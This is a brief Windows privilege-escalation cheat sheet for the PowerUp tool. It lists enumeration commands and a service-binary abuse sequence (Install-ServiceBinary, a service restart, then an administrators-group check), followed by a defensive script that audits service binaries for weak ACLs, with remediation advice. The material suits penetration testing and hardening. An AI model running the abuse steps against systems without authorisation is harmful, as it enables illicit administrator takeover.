PowerUp
PowerUp is a PowerShell tool used for privilege escalation on Windows systems. It identifies misconfigurations and exploitable settings that allow a user to elevate their privileges. It typically can be found at /share/windows-resources/powersploit/Privesc/PowerUp.ps1.
PowerShell commands for service interaction:
# Service status
Get-Service -Name 'BackupMonitor'
# Start/Stop the service
Start-Service -Name "<ServiceName>"
Stop-Service -Name "<ServiceName>" -Force
# Restart the service
Restart-Service -Name 'BackupMonitor' -Force
Run all of PowerUp's checks:
Invoke-AllChecks
Details with examples on how an abuse works:
help Invoke-ServiceAbuse -Examples
PrivescCheck and winPEAS can also be used for full coverage:
# PrivescCheck
Invoke-PrivEscCheck
# PEASS-ng
winPEASx64.exe -all
Enumerate potentially vulnerable services:
# Services whose binary the user can modify, or whose binary path or arguments can be changed
Get-ModifiableServiceFile
# Services whose configuration the user can modify
Get-ModifiableService
# Abuse the enumerated service
Install-ServiceBinary -Name 'mysql'
# Restart the service
Restart-Service -Name 'mysqld' -Force
# Confirm that it worked
net localgroup administrators
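As an added audit example, not code from PowerUp or from the original page, the following PowerShell reports services whose executable grants write-class rights to broad principals, which is the condition Get-ModifiableServiceFile flags, so the host owner can correct the ACLs before a privilege-escalation tool finds them. The principal list and the set of rights treated as write-class are my assumptions; run it as an administrator so every ACL is readable.

```powershell
# Added audit example (not part of PowerUp). Lists services whose binary can be
# written by broad, low-privilege principals. Principals and rights are assumptions.
$broadPrincipals = @(
    'Everyone',
    'BUILTIN\Users',
    'NT AUTHORITY\Authenticated Users',
    'NT AUTHORITY\INTERACTIVE'
)
# Rights that let a principal replace or alter the binary (or its permissions).
$writeClass = [System.Security.AccessControl.FileSystemRights]'Write, Modify, FullControl, WriteData, AppendData, TakeOwnership, ChangePermissions'

function Get-ServiceBinaryPath {
    param([string]$PathName)
    if (-not $PathName) { return $null }
    $expanded = [Environment]::ExpandEnvironmentVariables($PathName)
    # Quoted path: take what is inside the quotes; unquoted: take up to the first ".exe".
    if ($expanded -match '^"([^"]+)"') { return $Matches[1] }
    if ($expanded -match '^(.+?\.exe)') { return $Matches[1] }
    return $null
}

function Find-WritableServiceBinary {
    Get-CimInstance -ClassName Win32_Service | ForEach-Object {
        $svc = $_
        $bin = Get-ServiceBinaryPath -PathName $svc.PathName
        if (-not $bin -or -not (Test-Path -LiteralPath $bin)) { return }
        foreach ($ace in (Get-Acl -LiteralPath $bin).Access) {
            if ($ace.AccessControlType -ne 'Allow') { continue }
            if ($broadPrincipals -notcontains $ace.IdentityReference.Value) { continue }
            if (($ace.FileSystemRights -band $writeClass) -eq 0) { continue }
            # One finding per (service, principal) pair that can rewrite the binary.
            [pscustomobject]@{
                Service   = $svc.Name
                RunsAs    = $svc.StartName
                Binary    = $bin
                Principal = $ace.IdentityReference.Value
                Rights    = $ace.FileSystemRights
            }
        }
    }
}

Find-WritableServiceBinary | Format-Table -AutoSize
```

Each hit is remediated by restricting the binary and its directory to Administrators and SYSTEM, and by quoting any unquoted service path in the service configuration.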